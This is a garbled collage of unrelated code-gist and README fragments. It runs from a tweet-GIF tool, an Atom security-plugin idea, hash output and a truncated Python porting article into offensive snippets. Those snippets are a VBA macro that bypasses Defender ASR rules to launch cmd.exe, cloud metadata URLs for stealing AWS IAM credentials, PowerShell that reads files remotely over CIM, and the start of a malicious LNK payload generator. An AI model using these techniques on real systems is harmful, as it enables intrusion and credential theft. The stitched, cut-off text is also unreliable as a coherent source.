Emilio epinna

gif-from-tweet

There are so many great GIFs out there and I want to have copies of them. Twitter makes that harder than it should be by converting them to MP4 and not providing access to the source material. To make it easier, I made a bash pipeline that takes a tweet URL and a filename, extracts the MP4 from that tweet and uses ffmpeg to convert back to GIF.

Dependencies

ffmpeg
- macOS: brew install ffmpeg
- Ubuntu/Debian: apt install ffmpeg

User story

As an application security expert I use Atom to read source code. I would like to be able to have a plugin with features that will help me identify vulnerabilities.

Ideas

Add annotations to the source code: Select a few lines of code, right click, "Add annotation", text box appears, user types comments on the source code, clicks "Save". All annotations can be seen in a tab. If the code has annotations then it is highlighted differently (change background color)
The plugin implements methods for searching for XSS, SQL injection, etc. The plugin adds a menu

$ ./hashall.py asd
BLAKE2s256  256  2521f2bce24415ca048d86e965b49e9c0695547dffe6b441cc48cfb0043e6157
blake2b512  512  e4139471a1800a05b5e02b56669f025d01e33c5655153a4faa29f694f7849c63f97577fcc3e397d1138cf4640e0c2053e74a7af646598310d076dc6f15d1af50
SHA256      256  688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6
SHA512      512  e54ee7e285fbb0275279143abc4c554e5314e7b417ecac83a5984a964facbaad68866a2841c3e83ddf125a2985566261c4014f9f960ec60253aebcda9513a9b4
blake2s256  256  2521f2bce24415ca048d86e965b49e9c0695547dffe6b441cc48cfb0043e6157
MD4         128  61118995d26bef582a59dec9220483e8
sha256      256  688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6
sha512      512  e54ee7e285fbb0275279143abc4c554e5314e7b417ecac83a5984a964facbaad68866a2841c3e83ddf125a2985566261c4014f9f960ec60253aebcda9513a9b4

The Magic of the -3 Flag in Python 2

Porting code from Python 2 to Python 3 can be a daunting task. Tools like Futureize or Modernize can do most of the mechanical work for you, and Pylint can find obvious problems with code that's meant to be 2and3 compatible. You should absolutely be using these tools as they identify the lion's share of compatibility problems. Thanks to this work, it's really never been easier to port a large codebase to Python 3.

Even with these tools, however, porting code in a way that ensures identical behavior in Python 2 and Python 3 is tough. Python is a highly dynamic language and there is a huge breadth of changes between Python 2 and Python 3. Also, while we'd all love to work in code bases with 100% unit test coverage, the reality is unfortunately often very different. Given this, it's hard if not impossible for a static analysis tool t

	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub

	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

	# to run: docker-compose run
	#
	# Create a .evn file in the same folder as this file and change the variables.
	# MOUNT_POINT=/tmp/
	# VPN_PROVIDER=changeme
	# VPN_CONFIG=changeme
	# VPN_USERNAME=changeme
	# VPN_PASSWORD=changeme
	#
	#

	# IMPORTANT!
	# This gist has been transformed into a github repo
	# You can find the most recent version there:
	# https://github.com/Neo23x0/auditd

	# ___ ___ __ __
	# / \| __ ______/ (_) /_____/ /
	# / /\| \|/ / / / __ / / __/ __ /
	# / ___ / /_/ / /_/ / / /_/ /_/ /
	# /_/ \|_\__,_/\__,_/_/\__/\__,_/

	$CimSession = New-CimSession -ComputerName 10.0.0.2

	$FilePath = 'C:\Windows\System32\notepad.exe'

	# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
	$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
	$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
	$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
	$FileLengthBytes = $FileContents.FileData[0..3]
	[Array]::Reverse($FileLengthBytes)

	function Create-LNKPayload{
	<#
	.SYNOPSIS

	Generates a malicous LNK file

	.PARAMETER LNKName

	Name of the LNK file you want to create.